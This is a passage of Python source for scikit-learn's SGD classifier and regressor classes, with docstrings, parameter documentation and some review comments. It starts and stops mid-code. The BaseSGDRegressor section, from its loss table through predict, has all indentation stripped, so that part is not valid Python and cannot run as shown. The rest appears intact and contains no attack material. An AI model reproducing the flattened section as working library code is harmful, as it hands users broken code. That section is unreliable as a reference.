        "squared_epsilon_insensitive": (SquaredEpsilonInsensitive,
                                        DEFAULT_EPSILON),
    }
    @abstractmethod
    def __init__(self, loss="hinge", penalty='l2', alpha=0.0001,
                 l1_ratio=0.15, fit_intercept=True, max_iter=None, tol=None,
                 shuffle=True, verbose=0, epsilon=DEFAULT_EPSILON, n_jobs=1,
                 random_state=None, learning_rate="optimal", eta0=0.0,
                 power_t=0.5, class_weight=None, warm_start=False,
                 average=False, n_iter=None):
        super(BaseSGDClassifier, self).__init__(loss=loss, penalty=penalty,
                                                alpha=alpha, l1_ratio=l1_ratio,
                                                fit_intercept=fit_intercept,
                                                max_iter=max_iter, tol=tol,
                                                shuffle=shuffle,
                                                verbose=verbose,
                                                epsilon=epsilon,
                                                random_state=random_state,
                                                learning_rate=learning_rate,
                                                eta0=eta0, power_t=power_t,
                                                warm_start=warm_start,
                                                average=average,
                                                n_iter=n_iter)
        self.class_weight = class_weight
        self.n_jobs = int(n_jobs)
    @property
    @deprecated("Attribute loss_function was deprecated in version 0.19 and "
                "will be removed in 0.21. Use ``loss_function_`` instead")
    def loss_function(self):
        return self.loss_function_
    def _partial_fit(self, X, y, alpha, C,
                     loss, learning_rate, max_iter,
                     classes, sample_weight,
                     coef_init, intercept_init):
        """Run ``max_iter`` epochs of SGD on (X, y).

        Shared backend for both ``fit`` (which clears state first) and
        ``partial_fit`` (which calls this with ``max_iter=1``).
        """
        X, y = check_X_y(X, y, 'csr', dtype=np.float64, order="C")
        n_samples, n_features = X.shape
        # Sets self.classes_ on the first call; validates it afterwards.
        _check_partial_fit_first_call(self, classes)
        n_classes = self.classes_.shape[0]
        # Allocate datastructures from input arguments
        self._expanded_class_weight = compute_class_weight(self.class_weight,
                                                           self.classes_, y)
        sample_weight = self._validate_sample_weight(sample_weight, n_samples)
        if getattr(self, "coef_", None) is None or coef_init is not None:
            self._allocate_parameter_mem(n_classes, n_features,
                                         coef_init, intercept_init)
        elif n_features != self.coef_.shape[-1]:
            raise ValueError("Number of features %d does not match previous "
                             "data %d." % (n_features, self.coef_.shape[-1]))
        self.loss_function_ = self._get_loss_function(loss)
        if not hasattr(self, "t_"):
            self.t_ = 1.0
        # delegate to concrete training procedure
        if n_classes > 2:
            self._fit_multiclass(X, y, alpha=alpha, C=C,
                                 learning_rate=learning_rate,
                                 sample_weight=sample_weight,
                                 max_iter=max_iter)
        elif n_classes == 2:
            self._fit_binary(X, y, alpha=alpha, C=C,
                             learning_rate=learning_rate,
                             sample_weight=sample_weight,
                             max_iter=max_iter)
        else:
            raise ValueError(
                "The number of classes has to be greater than one;"
                " got %d class" % n_classes)
        return self
    def _fit(self, X, y, alpha, C, loss, learning_rate, coef_init=None,
             intercept_init=None, sample_weight=None):
        """Full-fit backend: reset state, then run up to ``_max_iter`` epochs.

        Warns with ConvergenceWarning if the epoch budget was exhausted
        while a tol-based stopping criterion was active.
        """
        self._validate_params()
        if hasattr(self, "classes_"):
            # Force _check_partial_fit_first_call to treat this as a fresh fit.
            self.classes_ = None
        X, y = check_X_y(X, y, 'csr', dtype=np.float64, order="C")
        n_samples, n_features = X.shape
        # labels can be encoded as float, int, or string literals
        # np.unique sorts in asc order; largest class id is positive class
        classes = np.unique(y)
        if self.warm_start and hasattr(self, "coef_"):
            if coef_init is None:
                coef_init = self.coef_
            if intercept_init is None:
                intercept_init = self.intercept_
        else:
            self.coef_ = None
            self.intercept_ = None
        if self.average > 0:
            self.standard_coef_ = self.coef_
            self.standard_intercept_ = self.intercept_
            self.average_coef_ = None
            self.average_intercept_ = None
        # Clear iteration count for multiple call to fit.
        self.t_ = 1.0
        self._partial_fit(X, y, alpha, C, loss, learning_rate, self._max_iter,
                          classes, sample_weight, coef_init, intercept_init)
        if (self._tol is not None and self._tol > -np.inf
                and self.n_iter_ == self._max_iter):
            warnings.warn("Maximum number of iteration reached before "
                          "convergence. Consider increasing max_iter to "
                          "improve the fit.",
                          ConvergenceWarning)
        return self
    def _fit_binary(self, X, y, alpha, C, sample_weight,
                    learning_rate, max_iter):
        """Fit a binary classifier on X and y. """
        # classes_[1] is the positive class by convention (np.unique order).
        coef, intercept, n_iter_ = fit_binary(self, 1, X, y, alpha, C,
                                              learning_rate, max_iter,
                                              self._expanded_class_weight[1],
                                              self._expanded_class_weight[0],
                                              sample_weight)
        self.t_ += n_iter_ * X.shape[0]
        self.n_iter_ = n_iter_
        # need to be 2d
        if self.average > 0:
            # Expose the averaged weights only once averaging has started
            # (after ``average`` samples have been seen).
            if self.average <= self.t_ - 1:
                self.coef_ = self.average_coef_.reshape(1, -1)
                self.intercept_ = self.average_intercept_
            else:
                self.coef_ = self.standard_coef_.reshape(1, -1)
                self.standard_intercept_ = np.atleast_1d(intercept)
                self.intercept_ = self.standard_intercept_
        else:
            self.coef_ = coef.reshape(1, -1)
            # intercept is a float, need to convert it to an array of length 1
            self.intercept_ = np.atleast_1d(intercept)
    def _fit_multiclass(self, X, y, alpha, C, learning_rate,
                        sample_weight, max_iter):
        """Fit a multi-class classifier by combining binary classifiers

        Each binary classifier predicts one class versus all others. This
        strategy is called OVA: One Versus All.
        """
        # Use joblib to fit OvA in parallel.
        result = Parallel(n_jobs=self.n_jobs, backend="threading",
                          verbose=self.verbose)(
            delayed(fit_binary)(self, i, X, y, alpha, C, learning_rate,
                                max_iter, self._expanded_class_weight[i],
                                1., sample_weight)
            for i in range(len(self.classes_)))
        # take the maximum of n_iter_ over every binary fit
        n_iter_ = 0.
        for i, (_, intercept, n_iter_i) in enumerate(result):
            self.intercept_[i] = intercept
            n_iter_ = max(n_iter_, n_iter_i)
        self.t_ += n_iter_ * X.shape[0]
        self.n_iter_ = n_iter_
        if self.average > 0:
            # Expose the averaged weights only once averaging has started.
            if self.average <= self.t_ - 1.0:
                self.coef_ = self.average_coef_
                self.intercept_ = self.average_intercept_
            else:
                self.coef_ = self.standard_coef_
                self.standard_intercept_ = np.atleast_1d(self.intercept_)
                self.intercept_ = self.standard_intercept_
    def partial_fit(self, X, y, classes=None, sample_weight=None):
        """Fit linear model with Stochastic Gradient Descent.

        Parameters
        ----------
        X : {array-like, sparse matrix}, shape (n_samples, n_features)
            Subset of the training data

        y : numpy array, shape (n_samples,)
            Subset of the target values

        classes : array, shape (n_classes,)
            Classes across all calls to partial_fit.
            Can be obtained by via `np.unique(y_all)`, where y_all is the
            target vector of the entire dataset.
            This argument is required for the first call to partial_fit
            and can be omitted in the subsequent calls.
            Note that y doesn't need to contain all labels in `classes`.

        sample_weight : array-like, shape (n_samples,), optional
            Weights applied to individual samples.
            If not provided, uniform weights are assumed.

        Returns
        -------
        self : returns an instance of self.
        """
        self._validate_params()
        if self.class_weight == 'balanced':
            # 'balanced' needs the full label distribution, which is unknown
            # in the incremental setting.
            raise ValueError("class_weight '{0}' is not supported for "
                             "partial_fit. In order to use 'balanced' weights,"
                             " use compute_class_weight('{0}', classes, y). "
                             "In place of y you can use a large enough sample "
                             "of the full training set target to properly "
                             "estimate the class frequency distributions. "
                             "Pass the resulting weights as the class_weight "
                             "parameter.".format(self.class_weight))
        return self._partial_fit(X, y, alpha=self.alpha, C=1.0, loss=self.loss,
                                 learning_rate=self.learning_rate, max_iter=1,
                                 classes=classes, sample_weight=sample_weight,
                                 coef_init=None, intercept_init=None)
    def fit(self, X, y, coef_init=None, intercept_init=None,
            sample_weight=None):
        """Fit linear model with Stochastic Gradient Descent.

        Parameters
        ----------
        X : {array-like, sparse matrix}, shape (n_samples, n_features)
            Training data

        y : numpy array, shape (n_samples,)
            Target values

        coef_init : array, shape (n_classes, n_features)
            The initial coefficients to warm-start the optimization.

        intercept_init : array, shape (n_classes,)
            The initial intercept to warm-start the optimization.

        sample_weight : array-like, shape (n_samples,), optional
            Weights applied to individual samples.
            If not provided, uniform weights are assumed. These weights will
            be multiplied with class_weight (passed through the
            constructor) if class_weight is specified

        Returns
        -------
        self : returns an instance of self.
        """
        return self._fit(X, y, alpha=self.alpha, C=1.0,
                         loss=self.loss, learning_rate=self.learning_rate,
                         coef_init=coef_init, intercept_init=intercept_init,
                         sample_weight=sample_weight)
class SGDClassifier(BaseSGDClassifier):
    """Linear classifiers (SVM, logistic regression, a.o.) with SGD training.
    This estimator implements regularized linear models with stochastic
    gradient descent (SGD) learning: the gradient of the loss is estimated
    each sample at a time and the model is updated along the way with a
    decreasing strength schedule (aka learning rate). SGD allows minibatch
    (online/out-of-core) learning, see the partial_fit method.
    For best results using the default learning rate schedule, the data should
    have zero mean and unit variance.
    This implementation works with data represented as dense or sparse arrays
    of floating point values for the features. The model it fits can be
    controlled with the loss parameter; by default, it fits a linear support
    vector machine (SVM).
    The regularizer is a penalty added to the loss function that shrinks model
    parameters towards the zero vector using either the squared euclidean norm
    L2 or the absolute norm L1 or a combination of both (Elastic Net). If the
    parameter update crosses the 0.0 value because of the regularizer, the
    update is truncated to 0.0 to allow for learning sparse models and achieve
    online feature selection.
    Read more in the :ref:`User Guide <sgd>`.
    Parameters
    ----------
    loss : str, default: 'hinge'
        The loss function to be used. Defaults to 'hinge', which gives a
        linear SVM.
        The possible options are 'hinge', 'log', 'modified_huber',
        'squared_hinge', 'perceptron', or a regression loss: 'squared_loss',
        'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'.
        The 'log' loss gives logistic regression, a probabilistic classifier.
        'modified_huber' is another smooth loss that brings tolerance to
        outliers as well as probability estimates.
        'squared_hinge' is like hinge but is quadratically penalized.
        'perceptron' is the linear loss used by the perceptron algorithm.
        The other losses are designed for regression but can be useful in
        classification as well; see SGDRegressor for a description.
    penalty : str, 'none', 'l2', 'l1', or 'elasticnet'
        The penalty (aka regularization term) to be used. Defaults to 'l2'
        which is the standard regularizer for linear SVM models. 'l1' and
        'elasticnet' might bring sparsity to the model (feature selection)
        not achievable with 'l2'.
    alpha : float
        Constant that multiplies the regularization term. Defaults to 0.0001
        Also used to compute learning_rate when set to 'optimal'.
    l1_ratio : float
        The Elastic Net mixing parameter, with 0 <= l1_ratio <= 1.
        l1_ratio=0 corresponds to L2 penalty, l1_ratio=1 to L1.
        Defaults to 0.15.
    fit_intercept : bool
        Whether the intercept should be estimated or not. If False, the
        data is assumed to be already centered. Defaults to True.
    max_iter : int, optional
        The maximum number of passes over the training data (aka epochs).
        It only impacts the behavior in the ``fit`` method, and not the
        `partial_fit`.
        Defaults to 5. Defaults to 1000 from 0.21, or if tol is not None.
        .. versionadded:: 0.19
    tol : float or None, optional
        The stopping criterion. If it is not None, the iterations will stop
        when (loss > previous_loss - tol). Defaults to None.
        Defaults to 1e-3 from 0.21.
        .. versionadded:: 0.19
    shuffle : bool, optional
        Whether or not the training data should be shuffled after each epoch.
        Defaults to True.
    verbose : integer, optional
        The verbosity level
    epsilon : float
        Epsilon in the epsilon-insensitive loss functions; only if `loss` is
        'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'.
        For 'huber', determines the threshold at which it becomes less
        important to get the prediction exactly right.
        For epsilon-insensitive, any differences between the current prediction
        and the correct label are ignored if they are less than this threshold.
    n_jobs : integer, optional
        The number of CPUs to use to do the OVA (One Versus All, for
        multi-class problems) computation. -1 means 'all CPUs'. Defaults
        to 1.
    random_state : int, RandomState instance or None, optional (default=None)
        The seed of the pseudo random number generator to use when shuffling
        the data. If int, random_state is the seed used by the random number
        generator; If RandomState instance, random_state is the random number
        generator; If None, the random number generator is the RandomState
        instance used by `np.random`.
    learning_rate : string, optional
        The learning rate schedule:
        - 'constant': eta = eta0
        - 'optimal': eta = 1.0 / (alpha * (t + t0)) [default]
        - 'invscaling': eta = eta0 / pow(t, power_t)
        where t0 is chosen by a heuristic proposed by Leon Bottou.
    eta0 : double
        The initial learning rate for the 'constant' or 'invscaling'
        schedules. The default value is 0.0 as eta0 is not used by the
        default schedule 'optimal'.
    power_t : double
        The exponent for inverse scaling learning rate [default 0.5].
    class_weight : dict, {class_label: weight} or "balanced" or None, optional
        Preset for the class_weight fit parameter.
        Weights associated with classes. If not given, all classes
        are supposed to have weight one.
        The "balanced" mode uses the values of y to automatically adjust
        weights inversely proportional to class frequencies in the input data
        as ``n_samples / (n_classes * np.bincount(y))``
    warm_start : bool, optional
        When set to True, reuse the solution of the previous call to fit as
        initialization, otherwise, just erase the previous solution.
    average : bool or int, optional
        When set to True, computes the averaged SGD weights and stores the
        result in the ``coef_`` attribute. If set to an int greater than 1,
        averaging will begin once the total number of samples seen reaches
        average. So ``average=10`` will begin averaging after seeing 10
        samples.
    n_iter : int, optional
        The number of passes over the training data (aka epochs).
        Defaults to None. Deprecated, will be removed in 0.21.
        .. versionchanged:: 0.19
            Deprecated
    Attributes
    ----------
    coef_ : array, shape (1, n_features) if n_classes == 2 else (n_classes,\
            n_features)
        Weights assigned to the features.
    intercept_ : array, shape (1,) if n_classes == 2 else (n_classes,)
        Constants in decision function.
    n_iter_ : int
        The actual number of iterations to reach the stopping criterion.
        For multiclass fits, it is the maximum over every binary fit.
    loss_function_ : concrete ``LossFunction``
    Examples
    --------
    >>> import numpy as np
    >>> from sklearn import linear_model
    >>> X = np.array([[-1, -1], [-2, -1], [1, 1], [2, 1]])
    >>> Y = np.array([1, 1, 2, 2])
    >>> clf = linear_model.SGDClassifier()
    >>> clf.fit(X, Y)
    ... #doctest: +NORMALIZE_WHITESPACE
    SGDClassifier(alpha=0.0001, average=False, class_weight=None, epsilon=0.1,
           eta0=0.0, fit_intercept=True, l1_ratio=0.15,
           learning_rate='optimal', loss='hinge', max_iter=None, n_iter=None,
           n_jobs=1, penalty='l2', power_t=0.5, random_state=None,
           shuffle=True, tol=None, verbose=0, warm_start=False)
    >>> print(clf.predict([[-0.8, -1]]))
    [1]
    See also
    --------
    LinearSVC, LogisticRegression, Perceptron
    """
    def __init__(self, loss="hinge", penalty='l2', alpha=0.0001, l1_ratio=0.15,
                 fit_intercept=True, max_iter=None, tol=None, shuffle=True,
                 verbose=0, epsilon=DEFAULT_EPSILON, n_jobs=1,
                 random_state=None, learning_rate="optimal", eta0=0.0,
                 power_t=0.5, class_weight=None, warm_start=False,
                 average=False, n_iter=None):
        # Simply forwards every parameter to BaseSGDClassifier.
        super(SGDClassifier, self).__init__(
            loss=loss, penalty=penalty, alpha=alpha, l1_ratio=l1_ratio,
            fit_intercept=fit_intercept, max_iter=max_iter, tol=tol,
            shuffle=shuffle, verbose=verbose, epsilon=epsilon, n_jobs=n_jobs,
            random_state=random_state, learning_rate=learning_rate, eta0=eta0,
            power_t=power_t, class_weight=class_weight, warm_start=warm_start,
            average=average, n_iter=n_iter)
    def _check_proba(self):
        """Raise unless the model is fitted with a probabilistic loss."""
        check_is_fitted(self, "t_")
        if self.loss not in ("log", "modified_huber"):
            raise AttributeError("probability estimates are not available for"
                                 " loss=%r" % self.loss)
    @property
    def predict_proba(self):
        """Probability estimates.
        This method is only available for log loss and modified Huber loss.
        Multiclass probability estimates are derived from binary (one-vs.-rest)
        estimates by simple normalization, as recommended by Zadrozny and
        Elkan.
        Binary probability estimates for loss="modified_huber" are given by
        (clip(decision_function(X), -1, 1) + 1) / 2. For other loss functions
        it is necessary to perform proper probability calibration by wrapping
        the classifier with
        :class:`sklearn.calibration.CalibratedClassifierCV` instead.
        Parameters
        ----------
        X : {array-like, sparse matrix}, shape (n_samples, n_features)
        Returns
        -------
        array, shape (n_samples, n_classes)
            Returns the probability of the sample for each class in the model,
            where classes are ordered as they are in `self.classes_`.
        References
        ----------
        Zadrozny and Elkan, "Transforming classifier scores into multiclass
        probability estimates", SIGKDD'02,
        http://www.research.ibm.com/people/z/zadrozny/kdd2002-Transf.pdf
        The justification for the formula in the loss="modified_huber"
        case is in the appendix B in:
        http://jmlr.csail.mit.edu/papers/volume2/zhang02c/zhang02c.pdf
        """
        # Implemented as a property so that the availability check runs at
        # attribute access time (AttributeError when loss is unsuitable),
        # which lets hasattr(clf, 'predict_proba') reflect the loss choice.
        self._check_proba()
        return self._predict_proba
    def _predict_proba(self, X):
        if self.loss == "log":
            return self._predict_proba_lr(X)
        elif self.loss == "modified_huber":
            binary = (len(self.classes_) == 2)
            scores = self.decision_function(X)
            if binary:
                # NOTE: ``prob`` is a *view* into column 1 of ``prob2``; the
                # in-place ops below therefore fill prob2[:, 1] directly.
                prob2 = np.ones((scores.shape[0], 2))
                prob = prob2[:, 1]
            else:
                prob = scores
            # (clip(score, -1, 1) + 1) / 2, computed in place.
            np.clip(scores, -1, 1, prob)
            prob += 1.
            prob /= 2.
            if binary:
                prob2[:, 0] -= prob
                prob = prob2
            else:
                # the above might assign zero to all classes, which doesn't
                # normalize neatly; work around this to produce uniform
                # probabilities
                prob_sum = prob.sum(axis=1)
                all_zero = (prob_sum == 0)
                if np.any(all_zero):
                    prob[all_zero, :] = 1
                    prob_sum[all_zero] = len(self.classes_)
                # normalize
                prob /= prob_sum.reshape((prob.shape[0], -1))
            return prob
        else:
            raise NotImplementedError("predict_(log_)proba only supported when"
                                      " loss='log' or loss='modified_huber' "
                                      "(%r given)" % self.loss)
    @property
    def predict_log_proba(self):
        """Log of probability estimates.
        This method is only available for log loss and modified Huber loss.
        When loss="modified_huber", probability estimates may be hard zeros
        and ones, so taking the logarithm is not possible.
        See ``predict_proba`` for details.
        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
        Returns
        -------
        T : array-like, shape (n_samples, n_classes)
            Returns the log-probability of the sample for each class in the
            model, where classes are ordered as they are in
            `self.classes_`.
        """
        self._check_proba()
        return self._predict_log_proba
    def _predict_log_proba(self, X):
        return np.log(self.predict_proba(X))
class BaseSGDRegressor(BaseSGD, RegressorMixin):
loss_functions = {
"squared_loss": (SquaredLoss, ),
"huber": (Huber, DEFAULT_EPSILON),
"epsilon_insensitive": (EpsilonInsensitive, DEFAULT_EPSILON),
"squared_epsilon_insensitive": (SquaredEpsilonInsensitive,
DEFAULT_EPSILON),
}
@abstractmethod
def __init__(self, loss="squared_loss", penalty="l2", alpha=0.0001,
l1_ratio=0.15, fit_intercept=True, max_iter=None, tol=None,
shuffle=True, verbose=0, epsilon=DEFAULT_EPSILON,
random_state=None, learning_rate="invscaling", eta0=0.01,
power_t=0.25, warm_start=False, average=False, n_iter=None):
super(BaseSGDRegressor, self).__init__(loss=loss, penalty=penalty,
alpha=alpha, l1_ratio=l1_ratio,
fit_intercept=fit_intercept,
max_iter=max_iter, tol=tol,
shuffle=shuffle,
verbose=verbose,
epsilon=epsilon,
random_state=random_state,
learning_rate=learning_rate,
eta0=eta0, power_t=power_t,
warm_start=warm_start,
average=average,
n_iter=n_iter)
def _partial_fit(self, X, y, alpha, C, loss, learning_rate,
max_iter, sample_weight, coef_init, intercept_init):
X, y = check_X_y(X, y, "csr", copy=False, order='C', dtype=np.float64)
y = y.astype(np.float64, copy=False)
n_samples, n_features = X.shape
# Allocate datastructures from input arguments
sample_weight = self._validate_sample_weight(sample_weight, n_samples)
if getattr(self, "coef_", None) is None:
self._allocate_parameter_mem(1, n_features,
coef_init, intercept_init)
elif n_features != self.coef_.shape[-1]:
raise ValueError("Number of features %d does not match previous "
"data %d." % (n_features, self.coef_.shape[-1]))
if self.average > 0 and getattr(self, "average_coef_", None) is None:
self.average_coef_ = np.zeros(n_features,
dtype=np.float64,
order="C")
self.average_intercept_ = np.zeros(1,
dtype=np.float64,
order="C")
self._fit_regressor(X, y, alpha, C, loss, learning_rate,
sample_weight, max_iter)
return self
def partial_fit(self, X, y, sample_weight=None):
"""Fit linear model with Stochastic Gradient Descent.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Subset of training data
y : numpy array of shape (n_samples,)
Subset of target values
sample_weight : array-like, shape (n_samples,), optional
Weights applied to individual samples.
If not provided, uniform weights are assumed.
Returns
-------
self : returns an instance of self.
"""
self._validate_params()
return self._partial_fit(X, y, self.alpha, C=1.0,
loss=self.loss,
learning_rate=self.learning_rate, max_iter=1,
sample_weight=sample_weight, coef_init=None,
intercept_init=None)
def _fit(self, X, y, alpha, C, loss, learning_rate, coef_init=None,
intercept_init=None, sample_weight=None):
self._validate_params()
if self.warm_start and getattr(self, "coef_", None) is not None:
if coef_init is None:
coef_init = self.coef_
if intercept_init is None:
intercept_init = self.intercept_
else:
self.coef_ = None
self.intercept_ = None
if self.average > 0:
self.standard_intercept_ = self.intercept_
self.standard_coef_ = self.coef_
self.average_coef_ = None
self.average_intercept_ = None
# Clear iteration count for multiple call to fit.
self.t_ = 1.0
self._partial_fit(X, y, alpha, C, loss, learning_rate,
self._max_iter, sample_weight, coef_init,
intercept_init)
if (self._tol is not None and self._tol > -np.inf
and self.n_iter_ == self._max_iter):
warnings.warn("Maximum number of iteration reached before "
"convergence. Consider increasing max_iter to "
"improve the fit.",
ConvergenceWarning)
return self
def fit(self, X, y, coef_init=None, intercept_init=None,
sample_weight=None):
"""Fit linear model with Stochastic Gradient Descent.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data
y : numpy array, shape (n_samples,)
Target values
coef_init : array, shape (n_features,)
The initial coefficients to warm-start the optimization.
intercept_init : array, shape (1,)
The initial intercept to warm-start the optimization.
sample_weight : array-like, shape (n_samples,), optional
Weights applied to individual samples (1. for unweighted).
Returns
-------
self : returns an instance of self.
"""
return self._fit(X, y, alpha=self.alpha, C=1.0,
loss=self.loss, learning_rate=self.learning_rate,
coef_init=coef_init,
intercept_init=intercept_init,
sample_weight=sample_weight)
def _decision_function(self, X):
"""Predict using the linear model
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Returns
-------
array, shape (n_samples,)
Predicted target values per element in X.
"""
check_is_fitted(self, ["t_", "coef_", "intercept_"], all_or_any=all)
X = check_array(X, accept_sparse='csr')
scores = safe_sparse_dot(X, self.coef_.T,
dense_output=True) + self.intercept_
return scores.ravel()
def predict(self, X):
"""Predict using the linear model
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Returns
-------
array, shape (n_samples,)
Predicted target values per element in X.
"""
return self._decision_function(X)
    def _fit_regressor(self, X, y, alpha, C, loss, learning_rate,
                       sample_weight, max_iter):
        """Run the SGD solver on (X, y) and store the fitted coefficients.

        NOTE(review): assumes X, y and the coef_/intercept_ buffers were
        already validated/allocated by the caller — confirm against
        _partial_fit.
        """
        dataset, intercept_decay = make_dataset(X, y, sample_weight)
        loss_function = self._get_loss_function(loss)
        penalty_type = self._get_penalty_type(self.penalty)
        learning_rate_type = self._get_learning_rate_type(learning_rate)
        # First fit ever: start the sample counter at 1.
        if not hasattr(self, "t_"):
            self.t_ = 1.0
        random_state = check_random_state(self.random_state)
        # numpy mtrand expects a C long which is a signed 32 bit integer under
        # Windows
        seed = random_state.randint(0, np.iinfo(np.int32).max)
        # -inf disables the tolerance-based early stopping in the solver.
        tol = self._tol if self._tol is not None else -np.inf
        if self.average > 0:
            # Averaged SGD: the solver maintains both the plain ("standard")
            # iterate and the running average of the weights.
            self.standard_coef_, self.standard_intercept_, \
                self.average_coef_, self.average_intercept_, self.n_iter_ =\
                average_sgd(self.standard_coef_,
                            self.standard_intercept_[0],
                            self.average_coef_,
                            self.average_intercept_[0],
                            loss_function,
                            penalty_type,
                            alpha, C,
                            self.l1_ratio,
                            dataset,
                            max_iter, tol,
                            int(self.fit_intercept),
                            int(self.verbose),
                            int(self.shuffle),
                            seed,
                            1.0, 1.0,
                            learning_rate_type,
                            self.eta0, self.power_t, self.t_,
                            intercept_decay, self.average)
            self.average_intercept_ = np.atleast_1d(self.average_intercept_)
            self.standard_intercept_ = np.atleast_1d(self.standard_intercept_)
            # t_ counts samples seen (plus one), across all epochs.
            self.t_ += self.n_iter_ * X.shape[0]
            # NOTE(review): exposes the averaged weights once averaging has
            # started (i.e. `average` samples have been seen) — confirm.
            if self.average <= self.t_ - 1.0:
                self.coef_ = self.average_coef_
                self.intercept_ = self.average_intercept_
            else:
                self.coef_ = self.standard_coef_
                self.intercept_ = self.standard_intercept_
        else:
            self.coef_, self.intercept_, self.n_iter_ = \
                plain_sgd(self.coef_,
                          self.intercept_[0],
                          loss_function,
                          penalty_type,
                          alpha, C,
                          self.l1_ratio,
                          dataset,
                          max_iter, tol,
                          int(self.fit_intercept),
                          int(self.verbose),
                          int(self.shuffle),
                          seed,
                          1.0, 1.0,
                          learning_rate_type,
                          self.eta0, self.power_t, self.t_,
                          intercept_decay)
            self.t_ += self.n_iter_ * X.shape[0]
            self.intercept_ = np.atleast_1d(self.intercept_)
class SGDRegressor(BaseSGDRegressor):
    """Linear model fitted by minimizing a regularized empirical loss with SGD
    SGD stands for Stochastic Gradient Descent: the gradient of the loss is
    estimated each sample at a time and the model is updated along the way with
    a decreasing strength schedule (aka learning rate).
    The regularizer is a penalty added to the loss function that shrinks model
    parameters towards the zero vector using either the squared euclidean norm
    L2 or the absolute norm L1 or a combination of both (Elastic Net). If the
    parameter update crosses the 0.0 value because of the regularizer, the
    update is truncated to 0.0 to allow for learning sparse models and achieve
    online feature selection.
    This implementation works with data represented as dense numpy arrays of
    floating point values for the features.
    Read more in the :ref:`User Guide <sgd>`.
    Parameters
    ----------
    loss : str, default: 'squared_loss'
        The loss function to be used. The possible values are 'squared_loss',
        'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'
        The 'squared_loss' refers to the ordinary least squares fit.
        'huber' modifies 'squared_loss' to focus less on getting outliers
        correct by switching from squared to linear loss past a distance of
        epsilon. 'epsilon_insensitive' ignores errors less than epsilon and is
        linear past that; this is the loss function used in SVR.
        'squared_epsilon_insensitive' is the same but becomes squared loss past
        a tolerance of epsilon.
    penalty : str, 'none', 'l2', 'l1', or 'elasticnet'
        The penalty (aka regularization term) to be used. Defaults to 'l2'
        which is the standard regularizer for linear SVM models. 'l1' and
        'elasticnet' might bring sparsity to the model (feature selection)
        not achievable with 'l2'.
    alpha : float
        Constant that multiplies the regularization term. Defaults to 0.0001
        Also used to compute learning_rate when set to 'optimal'.
    l1_ratio : float
        The Elastic Net mixing parameter, with 0 <= l1_ratio <= 1.
        l1_ratio=0 corresponds to L2 penalty, l1_ratio=1 to L1.
        Defaults to 0.15.
    fit_intercept : bool
        Whether the intercept should be estimated or not. If False, the
        data is assumed to be already centered. Defaults to True.
    max_iter : int, optional
        The maximum number of passes over the training data (aka epochs).
        It only impacts the behavior in the ``fit`` method, and not the
        `partial_fit`.
        Defaults to 5. Defaults to 1000 from 0.21, or if tol is not None.
        .. versionadded:: 0.19
    tol : float or None, optional
        The stopping criterion. If it is not None, the iterations will stop
        when (loss > previous_loss - tol). Defaults to None.
        Defaults to 1e-3 from 0.21.
        .. versionadded:: 0.19
    shuffle : bool, optional
        Whether or not the training data should be shuffled after each epoch.
        Defaults to True.
    verbose : integer, optional
        The verbosity level.
    epsilon : float
        Epsilon in the epsilon-insensitive loss functions; only if `loss` is
        'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'.
        For 'huber', determines the threshold at which it becomes less
        important to get the prediction exactly right.
        For epsilon-insensitive, any differences between the current prediction
        and the correct label are ignored if they are less than this threshold.
    random_state : int, RandomState instance or None, optional (default=None)
        The seed of the pseudo random number generator to use when shuffling
        the data. If int, random_state is the seed used by the random number
        generator; If RandomState instance, random_state is the random number
        generator; If None, the random number generator is the RandomState
        instance used by `np.random`.
    learning_rate : string, optional
        The learning rate schedule:
        - 'constant': eta = eta0
        - 'optimal': eta = 1.0 / (alpha * (t + t0)) [default]
        - 'invscaling': eta = eta0 / pow(t, power_t)
        where t0 is chosen by a heuristic proposed by Leon Bottou.
    eta0 : double, optional
        The initial learning rate [default 0.01].
    power_t : double, optional
        The exponent for inverse scaling learning rate [default 0.25].
    warm_start : bool, optional
        When set to True, reuse the solution of the previous call to fit as
        initialization, otherwise, just erase the previous solution.
    average : bool or int, optional
        When set to True, computes the averaged SGD weights and stores the
        result in the ``coef_`` attribute. If set to an int greater than 1,
        averaging will begin once the total number of samples seen reaches
        average. So ``average=10`` will begin averaging after seeing 10
        samples.
    n_iter : int, optional
        The number of passes over the training data (aka epochs).
        Defaults to None. Deprecated, will be removed in 0.21.
        .. versionchanged:: 0.19
            Deprecated
    Attributes
    ----------
    coef_ : array, shape (n_features,)
        Weights assigned to the features.
    intercept_ : array, shape (1,)
        The intercept term.
    average_coef_ : array, shape (n_features,)
        Averaged weights assigned to the features.
    average_intercept_ : array, shape (1,)
        The averaged intercept term.
    n_iter_ : int
        The actual number of iterations to reach the stopping criterion.
    Examples
    --------
    >>> import numpy as np
    >>> from sklearn import linear_model
    >>> n_samples, n_features = 10, 5
    >>> np.random.seed(0)
    >>> y = np.random.randn(n_samples)
    >>> X = np.random.randn(n_samples, n_features)
    >>> clf = linear_model.SGDRegressor()
    >>> clf.fit(X, y)
    ... #doctest: +NORMALIZE_WHITESPACE
    SGDRegressor(alpha=0.0001, average=False, epsilon=0.1, eta0=0.01,
           fit_intercept=True, l1_ratio=0.15, learning_rate='invscaling',
           loss='squared_loss', max_iter=None, n_iter=None, penalty='l2',
           power_t=0.25, random_state=None, shuffle=True, tol=None,
           verbose=0, warm_start=False)
    See also
    --------
    Ridge, ElasticNet, Lasso, SVR
    """
    def __init__(self, loss="squared_loss", penalty="l2", alpha=0.0001,
                 l1_ratio=0.15, fit_intercept=True, max_iter=None, tol=None,
                 shuffle=True, verbose=0, epsilon=DEFAULT_EPSILON,
                 random_state=None, learning_rate="invscaling", eta0=0.01,
                 power_t=0.25, warm_start=False, average=False, n_iter=None):
        # Thin wrapper: all fitting logic lives in BaseSGDRegressor; this
        # subclass only fixes the public estimator's parameter defaults.
        super(SGDRegressor, self).__init__(loss=loss, penalty=penalty,
                                           alpha=alpha, l1_ratio=l1_ratio,
                                           fit_intercept=fit_intercept,
                                           max_iter=max_iter, tol=tol,
                                           shuffle=shuffle,
                                           verbose=verbose,
                                           epsilon=epsilon,
